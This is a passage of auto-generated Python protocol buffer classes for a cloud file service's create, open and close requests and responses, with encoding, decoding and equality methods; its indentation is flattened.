assert x is not self
if (x.has_key()): self.set_key(x.key())
for i in xrange(x.value_size()): self.add_value(x.value(i))
if (x.has_partial()): self.set_partial(x.partial())
def Equals(self, x):
if x is self: return 1
if self.has_key_ != x.has_key_: return 0
if self.has_key_ and self.key_ != x.key_: return 0
if len(self.value_) != len(x.value_): return 0
for e1, e2 in zip(self.value_, x.value_):
if e1 != e2: return 0
if self.has_partial_ != x.has_partial_: return 0
if self.has_partial_ and self.partial_ != x.partial_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_key_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: key not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.key_))
n += 1 * len(self.value_)
for i in xrange(len(self.value_)): n += self.lengthString(len(self.value_[i]))
if (self.has_partial_): n += 2
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_key_):
n += 1
n += self.lengthString(len(self.key_))
n += 1 * len(self.value_)
for i in xrange(len(self.value_)): n += self.lengthString(len(self.value_[i]))
if (self.has_partial_): n += 2
return n
def Clear(self):
self.clear_key()
self.clear_value()
self.clear_partial()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.key_)
for i in xrange(len(self.value_)):
out.putVarInt32(18)
out.putPrefixedString(self.value_[i])
if (self.has_partial_):
out.putVarInt32(24)
out.putBoolean(self.partial_)
def OutputPartial(self, out):
if (self.has_key_):
out.putVarInt32(10)
out.putPrefixedString(self.key_)
for i in xrange(len(self.value_)):
out.putVarInt32(18)
out.putPrefixedString(self.value_[i])
if (self.has_partial_):
out.putVarInt32(24)
out.putBoolean(self.partial_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_key(d.getPrefixedString())
continue
if tt == 18:
self.add_value(d.getPrefixedString())
continue
if tt == 24:
self.set_partial(d.getBoolean())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_key_: res+=prefix+("key: %s\n" % self.DebugFormatString(self.key_))
cnt=0
for e in self.value_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("value%s: %s\n" % (elm, self.DebugFormatString(e)))
cnt+=1
if self.has_partial_: res+=prefix+("partial: %s\n" % self.DebugFormatBool(self.partial_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kkey = 1
kvalue = 2
kpartial = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "key",
2: "value",
3: "partial",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.NUMERIC,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.KeyValues'
class FileContentType(ProtocolBuffer.ProtocolMessage):
RAW = 0
DEPRECATED_1 = 2
INVALID_TYPE = 127
_ContentType_NAMES = {
0: "RAW",
2: "DEPRECATED_1",
127: "INVALID_TYPE",
}
def ContentType_Name(cls, x): return cls._ContentType_NAMES.get(x, "")
ContentType_Name = classmethod(ContentType_Name)
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.FileContentType'
class CreateRequest_Parameter(ProtocolBuffer.ProtocolMessage):
has_name_ = 0
name_ = ""
has_value_ = 0
value_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def name(self): return self.name_
def set_name(self, x):
self.has_name_ = 1
self.name_ = x
def clear_name(self):
if self.has_name_:
self.has_name_ = 0
self.name_ = ""
def has_name(self): return self.has_name_
def value(self): return self.value_
def set_value(self, x):
self.has_value_ = 1
self.value_ = x
def clear_value(self):
if self.has_value_:
self.has_value_ = 0
self.value_ = ""
def has_value(self): return self.has_value_
def MergeFrom(self, x):
assert x is not self
if (x.has_name()): self.set_name(x.name())
if (x.has_value()): self.set_value(x.value())
def Equals(self, x):
if x is self: return 1
if self.has_name_ != x.has_name_: return 0
if self.has_name_ and self.name_ != x.name_: return 0
if self.has_value_ != x.has_value_: return 0
if self.has_value_ and self.value_ != x.value_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_name_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: name not set.')
if (not self.has_value_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: value not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.name_))
n += self.lengthString(len(self.value_))
return n + 2
def ByteSizePartial(self):
n = 0
if (self.has_name_):
n += 1
n += self.lengthString(len(self.name_))
if (self.has_value_):
n += 1
n += self.lengthString(len(self.value_))
return n
def Clear(self):
self.clear_name()
self.clear_value()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
out.putVarInt32(18)
out.putPrefixedString(self.value_)
def OutputPartial(self, out):
if (self.has_name_):
out.putVarInt32(10)
out.putPrefixedString(self.name_)
if (self.has_value_):
out.putVarInt32(18)
out.putPrefixedString(self.value_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_name(d.getPrefixedString())
continue
if tt == 18:
self.set_value(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_name_: res+=prefix+("name: %s\n" % self.DebugFormatString(self.name_))
if self.has_value_: res+=prefix+("value: %s\n" % self.DebugFormatString(self.value_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kname = 1
kvalue = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "name",
2: "value",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.CreateRequest_Parameter'
class CreateRequest(ProtocolBuffer.ProtocolMessage):
has_filesystem_ = 0
filesystem_ = ""
has_content_type_ = 0
content_type_ = 0
has_filename_ = 0
filename_ = ""
has_expiration_time_seconds_ = 0
expiration_time_seconds_ = 0
def __init__(self, contents=None):
self.parameters_ = []
if contents is not None: self.MergeFromString(contents)
def filesystem(self): return self.filesystem_
def set_filesystem(self, x):
self.has_filesystem_ = 1
self.filesystem_ = x
def clear_filesystem(self):
if self.has_filesystem_:
self.has_filesystem_ = 0
self.filesystem_ = ""
def has_filesystem(self): return self.has_filesystem_
def content_type(self): return self.content_type_
def set_content_type(self, x):
self.has_content_type_ = 1
self.content_type_ = x
def clear_content_type(self):
if self.has_content_type_:
self.has_content_type_ = 0
self.content_type_ = 0
def has_content_type(self): return self.has_content_type_
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def parameters_size(self): return len(self.parameters_)
def parameters_list(self): return self.parameters_
def parameters(self, i):
return self.parameters_[i]
def mutable_parameters(self, i):
return self.parameters_[i]
def add_parameters(self):
x = CreateRequest_Parameter()
self.parameters_.append(x)
return x
def clear_parameters(self):
self.parameters_ = []
def expiration_time_seconds(self): return self.expiration_time_seconds_
def set_expiration_time_seconds(self, x):
self.has_expiration_time_seconds_ = 1
self.expiration_time_seconds_ = x
def clear_expiration_time_seconds(self):
if self.has_expiration_time_seconds_:
self.has_expiration_time_seconds_ = 0
self.expiration_time_seconds_ = 0
def has_expiration_time_seconds(self): return self.has_expiration_time_seconds_
def MergeFrom(self, x):
assert x is not self
if (x.has_filesystem()): self.set_filesystem(x.filesystem())
if (x.has_content_type()): self.set_content_type(x.content_type())
if (x.has_filename()): self.set_filename(x.filename())
for i in xrange(x.parameters_size()): self.add_parameters().CopyFrom(x.parameters(i))
if (x.has_expiration_time_seconds()): self.set_expiration_time_seconds(x.expiration_time_seconds())
def Equals(self, x):
if x is self: return 1
if self.has_filesystem_ != x.has_filesystem_: return 0
if self.has_filesystem_ and self.filesystem_ != x.filesystem_: return 0
if self.has_content_type_ != x.has_content_type_: return 0
if self.has_content_type_ and self.content_type_ != x.content_type_: return 0
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
if len(self.parameters_) != len(x.parameters_): return 0
for e1, e2 in zip(self.parameters_, x.parameters_):
if e1 != e2: return 0
if self.has_expiration_time_seconds_ != x.has_expiration_time_seconds_: return 0
if self.has_expiration_time_seconds_ and self.expiration_time_seconds_ != x.expiration_time_seconds_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filesystem_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filesystem not set.')
if (not self.has_content_type_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: content_type not set.')
for p in self.parameters_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filesystem_))
n += self.lengthVarInt64(self.content_type_)
if (self.has_filename_): n += 1 + self.lengthString(len(self.filename_))
n += 1 * len(self.parameters_)
for i in xrange(len(self.parameters_)): n += self.lengthString(self.parameters_[i].ByteSize())
if (self.has_expiration_time_seconds_): n += 1 + self.lengthVarInt64(self.expiration_time_seconds_)
return n + 2
def ByteSizePartial(self):
n = 0
if (self.has_filesystem_):
n += 1
n += self.lengthString(len(self.filesystem_))
if (self.has_content_type_):
n += 1
n += self.lengthVarInt64(self.content_type_)
if (self.has_filename_): n += 1 + self.lengthString(len(self.filename_))
n += 1 * len(self.parameters_)
for i in xrange(len(self.parameters_)): n += self.lengthString(self.parameters_[i].ByteSizePartial())
if (self.has_expiration_time_seconds_): n += 1 + self.lengthVarInt64(self.expiration_time_seconds_)
return n
def Clear(self):
self.clear_filesystem()
self.clear_content_type()
self.clear_filename()
self.clear_parameters()
self.clear_expiration_time_seconds()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filesystem_)
out.putVarInt32(16)
out.putVarInt32(self.content_type_)
if (self.has_filename_):
out.putVarInt32(26)
out.putPrefixedString(self.filename_)
for i in xrange(len(self.parameters_)):
out.putVarInt32(34)
out.putVarInt32(self.parameters_[i].ByteSize())
self.parameters_[i].OutputUnchecked(out)
if (self.has_expiration_time_seconds_):
out.putVarInt32(40)
out.putVarInt64(self.expiration_time_seconds_)
def OutputPartial(self, out):
if (self.has_filesystem_):
out.putVarInt32(10)
out.putPrefixedString(self.filesystem_)
if (self.has_content_type_):
out.putVarInt32(16)
out.putVarInt32(self.content_type_)
if (self.has_filename_):
out.putVarInt32(26)
out.putPrefixedString(self.filename_)
for i in xrange(len(self.parameters_)):
out.putVarInt32(34)
out.putVarInt32(self.parameters_[i].ByteSizePartial())
self.parameters_[i].OutputPartial(out)
if (self.has_expiration_time_seconds_):
out.putVarInt32(40)
out.putVarInt64(self.expiration_time_seconds_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filesystem(d.getPrefixedString())
continue
if tt == 16:
self.set_content_type(d.getVarInt32())
continue
if tt == 26:
self.set_filename(d.getPrefixedString())
continue
if tt == 34:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_parameters().TryMerge(tmp)
continue
if tt == 40:
self.set_expiration_time_seconds(d.getVarInt64())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filesystem_: res+=prefix+("filesystem: %s\n" % self.DebugFormatString(self.filesystem_))
if self.has_content_type_: res+=prefix+("content_type: %s\n" % self.DebugFormatInt32(self.content_type_))
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
cnt=0
for e in self.parameters_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("parameters%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_expiration_time_seconds_: res+=prefix+("expiration_time_seconds: %s\n" % self.DebugFormatInt64(self.expiration_time_seconds_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilesystem = 1
kcontent_type = 2
kfilename = 3
kparameters = 4
kexpiration_time_seconds = 5
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filesystem",
2: "content_type",
3: "filename",
4: "parameters",
5: "expiration_time_seconds",
}, 5)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
3: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.STRING,
5: ProtocolBuffer.Encoder.NUMERIC,
}, 5, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.CreateRequest'
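# CreateResponse: carries a single required string field, 'filename' (tag 1),
# presumably the path of the file created by the preceding CreateRequest.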
class CreateResponse(ProtocolBuffer.ProtocolMessage):
has_filename_ = 0
filename_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filename_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filename not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filename_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_filename_):
n += 1
n += self.lengthString(len(self.filename_))
return n
def Clear(self):
self.clear_filename()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.CreateResponse'
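# OpenRequest: required fields are 'filename' (tag 1), integer 'content_type'
# (tag 2) and 'open_mode' (tag 3, APPEND=1 or READ=2); 'exclusive_lock',
# 'buffered_output' and 'open_lease_time_seconds' (default 30) are optional.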
class OpenRequest(ProtocolBuffer.ProtocolMessage):
APPEND = 1
READ = 2
_OpenMode_NAMES = {
1: "APPEND",
2: "READ",
}
def OpenMode_Name(cls, x): return cls._OpenMode_NAMES.get(x, "")
OpenMode_Name = classmethod(OpenMode_Name)
has_filename_ = 0
filename_ = ""
has_content_type_ = 0
content_type_ = 0
has_open_mode_ = 0
open_mode_ = 0
has_exclusive_lock_ = 0
exclusive_lock_ = 0
has_buffered_output_ = 0
buffered_output_ = 0
has_open_lease_time_seconds_ = 0
open_lease_time_seconds_ = 30
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def content_type(self): return self.content_type_
def set_content_type(self, x):
self.has_content_type_ = 1
self.content_type_ = x
def clear_content_type(self):
if self.has_content_type_:
self.has_content_type_ = 0
self.content_type_ = 0
def has_content_type(self): return self.has_content_type_
def open_mode(self): return self.open_mode_
def set_open_mode(self, x):
self.has_open_mode_ = 1
self.open_mode_ = x
def clear_open_mode(self):
if self.has_open_mode_:
self.has_open_mode_ = 0
self.open_mode_ = 0
def has_open_mode(self): return self.has_open_mode_
def exclusive_lock(self): return self.exclusive_lock_
def set_exclusive_lock(self, x):
self.has_exclusive_lock_ = 1
self.exclusive_lock_ = x
def clear_exclusive_lock(self):
if self.has_exclusive_lock_:
self.has_exclusive_lock_ = 0
self.exclusive_lock_ = 0
def has_exclusive_lock(self): return self.has_exclusive_lock_
def buffered_output(self): return self.buffered_output_
def set_buffered_output(self, x):
self.has_buffered_output_ = 1
self.buffered_output_ = x
def clear_buffered_output(self):
if self.has_buffered_output_:
self.has_buffered_output_ = 0
self.buffered_output_ = 0
def has_buffered_output(self): return self.has_buffered_output_
def open_lease_time_seconds(self): return self.open_lease_time_seconds_
def set_open_lease_time_seconds(self, x):
self.has_open_lease_time_seconds_ = 1
self.open_lease_time_seconds_ = x
def clear_open_lease_time_seconds(self):
if self.has_open_lease_time_seconds_:
self.has_open_lease_time_seconds_ = 0
self.open_lease_time_seconds_ = 30
def has_open_lease_time_seconds(self): return self.has_open_lease_time_seconds_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
if (x.has_content_type()): self.set_content_type(x.content_type())
if (x.has_open_mode()): self.set_open_mode(x.open_mode())
if (x.has_exclusive_lock()): self.set_exclusive_lock(x.exclusive_lock())
if (x.has_buffered_output()): self.set_buffered_output(x.buffered_output())
if (x.has_open_lease_time_seconds()): self.set_open_lease_time_seconds(x.open_lease_time_seconds())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
if self.has_content_type_ != x.has_content_type_: return 0
if self.has_content_type_ and self.content_type_ != x.content_type_: return 0
if self.has_open_mode_ != x.has_open_mode_: return 0
if self.has_open_mode_ and self.open_mode_ != x.open_mode_: return 0
if self.has_exclusive_lock_ != x.has_exclusive_lock_: return 0
if self.has_exclusive_lock_ and self.exclusive_lock_ != x.exclusive_lock_: return 0
if self.has_buffered_output_ != x.has_buffered_output_: return 0
if self.has_buffered_output_ and self.buffered_output_ != x.buffered_output_: return 0
if self.has_open_lease_time_seconds_ != x.has_open_lease_time_seconds_: return 0
if self.has_open_lease_time_seconds_ and self.open_lease_time_seconds_ != x.open_lease_time_seconds_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filename_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filename not set.')
if (not self.has_content_type_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: content_type not set.')
if (not self.has_open_mode_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: open_mode not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filename_))
n += self.lengthVarInt64(self.content_type_)
n += self.lengthVarInt64(self.open_mode_)
if (self.has_exclusive_lock_): n += 2
if (self.has_buffered_output_): n += 2
if (self.has_open_lease_time_seconds_): n += 1 + self.lengthVarInt64(self.open_lease_time_seconds_)
return n + 3
def ByteSizePartial(self):
n = 0
if (self.has_filename_):
n += 1
n += self.lengthString(len(self.filename_))
if (self.has_content_type_):
n += 1
n += self.lengthVarInt64(self.content_type_)
if (self.has_open_mode_):
n += 1
n += self.lengthVarInt64(self.open_mode_)
if (self.has_exclusive_lock_): n += 2
if (self.has_buffered_output_): n += 2
if (self.has_open_lease_time_seconds_): n += 1 + self.lengthVarInt64(self.open_lease_time_seconds_)
return n
def Clear(self):
self.clear_filename()
self.clear_content_type()
self.clear_open_mode()
self.clear_exclusive_lock()
self.clear_buffered_output()
self.clear_open_lease_time_seconds()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
out.putVarInt32(16)
out.putVarInt32(self.content_type_)
out.putVarInt32(24)
out.putVarInt32(self.open_mode_)
if (self.has_exclusive_lock_):
out.putVarInt32(32)
out.putBoolean(self.exclusive_lock_)
if (self.has_buffered_output_):
out.putVarInt32(40)
out.putBoolean(self.buffered_output_)
if (self.has_open_lease_time_seconds_):
out.putVarInt32(48)
out.putVarInt32(self.open_lease_time_seconds_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
if (self.has_content_type_):
out.putVarInt32(16)
out.putVarInt32(self.content_type_)
if (self.has_open_mode_):
out.putVarInt32(24)
out.putVarInt32(self.open_mode_)
if (self.has_exclusive_lock_):
out.putVarInt32(32)
out.putBoolean(self.exclusive_lock_)
if (self.has_buffered_output_):
out.putVarInt32(40)
out.putBoolean(self.buffered_output_)
if (self.has_open_lease_time_seconds_):
out.putVarInt32(48)
out.putVarInt32(self.open_lease_time_seconds_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if tt == 16:
self.set_content_type(d.getVarInt32())
continue
if tt == 24:
self.set_open_mode(d.getVarInt32())
continue
if tt == 32:
self.set_exclusive_lock(d.getBoolean())
continue
if tt == 40:
self.set_buffered_output(d.getBoolean())
continue
if tt == 48:
self.set_open_lease_time_seconds(d.getVarInt32())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
if self.has_content_type_: res+=prefix+("content_type: %s\n" % self.DebugFormatInt32(self.content_type_))
if self.has_open_mode_: res+=prefix+("open_mode: %s\n" % self.DebugFormatInt32(self.open_mode_))
if self.has_exclusive_lock_: res+=prefix+("exclusive_lock: %s\n" % self.DebugFormatBool(self.exclusive_lock_))
if self.has_buffered_output_: res+=prefix+("buffered_output: %s\n" % self.DebugFormatBool(self.buffered_output_))
if self.has_open_lease_time_seconds_: res+=prefix+("open_lease_time_seconds: %s\n" % self.DebugFormatInt32(self.open_lease_time_seconds_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
kcontent_type = 2
kopen_mode = 3
kexclusive_lock = 4
kbuffered_output = 5
kopen_lease_time_seconds = 6
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
2: "content_type",
3: "open_mode",
4: "exclusive_lock",
5: "buffered_output",
6: "open_lease_time_seconds",
}, 6)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
3: ProtocolBuffer.Encoder.NUMERIC,
4: ProtocolBuffer.Encoder.NUMERIC,
5: ProtocolBuffer.Encoder.NUMERIC,
6: ProtocolBuffer.Encoder.NUMERIC,
}, 6, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.OpenRequest'
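# OpenResponse: an empty acknowledgement message with no fields.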
class OpenResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.OpenResponse'
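# CloseRequest: names the file to close via the required 'filename' field;
# the optional 'finalize' bool presumably marks the file immutable on close.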
class CloseRequest(ProtocolBuffer.ProtocolMessage):
has_filename_ = 0
filename_ = ""
has_finalize_ = 0
finalize_ = 0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def finalize(self): return self.finalize_
def set_finalize(self, x):
self.has_finalize_ = 1
self.finalize_ = x
def clear_finalize(self):
if self.has_finalize_:
self.has_finalize_ = 0
self.finalize_ = 0
def has_finalize(self): return self.has_finalize_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
if (x.has_finalize()): self.set_finalize(x.finalize())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
if self.has_finalize_ != x.has_finalize_: return 0
if self.has_finalize_ and self.finalize_ != x.finalize_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filename_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filename not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filename_))
if (self.has_finalize_): n += 2
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_filename_):
n += 1
n += self.lengthString(len(self.filename_))
if (self.has_finalize_): n += 2
return n
def Clear(self):
self.clear_filename()
self.clear_finalize()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
if (self.has_finalize_):
out.putVarInt32(16)
out.putBoolean(self.finalize_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
if (self.has_finalize_):
out.putVarInt32(16)
out.putBoolean(self.finalize_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if tt == 16:
self.set_finalize(d.getBoolean())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
if self.has_finalize_: res+=prefix+("finalize: %s\n" % self.DebugFormatBool(self.finalize_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
kfinalize = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
2: "finalize",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.CloseRequest'
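# CloseResponse: an empty acknowledgement message with no fields.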
class CloseResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
